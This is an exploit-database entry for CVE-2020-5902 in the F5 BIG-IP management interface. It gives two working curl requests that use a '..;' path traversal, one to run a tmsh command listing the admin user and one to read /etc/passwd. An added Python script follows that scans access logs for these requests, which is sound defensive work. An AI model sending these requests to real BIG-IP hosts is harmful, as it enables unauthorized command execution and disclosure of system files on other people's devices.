BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)

Author: Budi Khoirudin
type: webapps
platform: linux
date_added: 2020-07-07  
date_updated: 2022-11-04  
verified: 0  
codes: CVE-2020-5902  

raw file: 48643.txt

## RCE:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

## Read File:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
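
A log check for the two requests above, added here as an example and not part of the original entry: it flags TMUI request paths that contain a `..;` segment and reports which of the two pages was reached. The access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ".." path segment carrying a ";" path parameter, as in "/login.jsp/..;/".
DOTDOT_PARAM_RE = re.compile(r"/\.\.;[^/]*(/|$)")
# TMUI pages named in the two requests on this page (lower-cased for matching).
SENSITIVE_PAGES = ("tmshcmd.jsp", "fileread.jsp")
# Constructed sample log lines; client addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4521',
    '198.51.100.7 - - [07/Jul/2020:10:00:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Jul/2020:10:00:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1044',
    '192.0.2.10 - - [07/Jul/2020:10:00:12 +0000] "GET /tmui/tmui/skins/Default/css/login.css HTTP/1.1" 200 900',
]

def classify(target):
    """Return None for a clean request target, else a dict describing the match."""
    parts = urlsplit(target)
    path = parts.path
    # Normalise percent-encoding (up to three passes) before pattern matching.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    lowered = path.lower()
    if "/tmui/" not in lowered or not DOTDOT_PARAM_RE.search(lowered):
        return None
    page = next((p for p in SENSITIVE_PAGES if lowered.endswith("/" + p)), None)
    return {"path": path, "page": page, "query": unquote_plus(parts.query)}

def scan(lines):
    """Return one finding per log line whose request target matches."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        finding = classify(m.group("target")) if m else None
        if finding:
            finding.update(line=lineno, client=line.split(" ", 1)[0])
            hits.append(finding)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding whose `page` is `None` still matched the `..;` segment under `/tmui/` and is worth reviewing; the `query` field shows the `command` or `fileName` value that was requested.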